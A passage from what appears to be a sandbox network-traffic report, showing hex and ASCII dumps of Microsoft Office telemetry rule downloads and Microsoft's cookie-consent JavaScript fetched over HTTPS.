                                                                                                                                                                                          Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                          2024-11-23 16:44:52 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                          Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                          2024-11-23 16:44:52 UTC712INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                          Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                                          2024-11-23 16:44:53 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                                                                                                                          Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                                                                                                                          2024-11-23 16:44:53 UTC3566INData Raw: 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67
                                                                                                                                                                                          Data Ascii: "-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChang


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          74192.168.2.54980613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:54 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:54 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 408
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                          x-ms-request-id: 8d96ff29-301e-0020-36b1-3b6299000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164454Z-15b8b599d88tmlzshC1TEB4xpn00000002z000000000nn8e
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:54 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          75192.168.2.54980413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:54 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:54 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 407
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                          ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                          x-ms-request-id: 390d82dd-f01e-0071-4371-3c431c000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164454Z-174c587ffdfb5q56hC1TEB04kg000000032g00000000eqap
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:54 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          76192.168.2.54980513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:54 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:54 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 474
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                          x-ms-request-id: 3b3ce442-a01e-001e-3708-3d49ef000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164454Z-178bfbc474bvjk8shC1NYC83ns00000004pg000000001h9r
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:54 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          77192.168.2.54980713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:54 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:54 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 469
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                          x-ms-request-id: c700c3f3-301e-0000-760a-3deecc000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164454Z-15b8b599d882hxlwhC1TEBfa5w000000037000000000055v
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:54 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          78192.168.2.54980813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:54 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:44:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:54 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 416
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                          ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                          x-ms-request-id: 93d7ba64-801e-002a-7fce-3b31dc000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164454Z-15b8b599d885ffrhhC1TEBtuv0000000038g00000000a4m9
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:54 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          79192.168.2.54981113.107.246.634431708C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:44:55 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                          Host: wcpstatic.microsoft.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-11-23 16:44:55 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:44:55 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 52717
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                          Age: 34761
                                                                                                                                                                                          Cache-Control: max-age=43200
                                                                                                                                                                                          Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                          Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                          Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                                                                          x-ms-request-id: 3774b461-701e-003c-4476-3de918000000
                                                                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                                                                          x-azure-ref: 20241123T164455Z-15b8b599d88wn9hhhC1TEBry0g000000037000000000dnpy
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:44:55 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                          Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                          2024-11-23 16:44:55 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                          Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                          2024-11-23 16:44:55 UTC711INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                          Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
